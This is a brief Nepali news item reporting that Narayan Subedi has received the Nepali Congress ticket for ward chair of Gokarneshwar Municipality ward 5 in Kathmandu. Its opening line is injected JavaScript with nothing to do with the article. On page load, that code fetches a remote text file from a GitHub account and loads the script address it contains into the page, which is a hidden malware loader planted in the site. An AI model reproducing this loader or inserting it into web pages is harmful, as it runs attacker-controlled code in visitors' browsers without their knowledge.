;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
नेपाली काँग्रेस पार्टीबाट काठमाडौँ क्षेत्र नं ३ गोकर्णेश्वर नगरपालिका वडा नं ५ को वडा अध्यक्षमा नरायण सुबेदीले टिकेट पाएका छन् |
उनि गत २०७४ सालको स्थानि चुनाबमा पनि वडा अध्यक्ष भएर नै आफ्नो कार्यकाल समालेका थिए |
फेसबुक प्रतिक्रियाहरु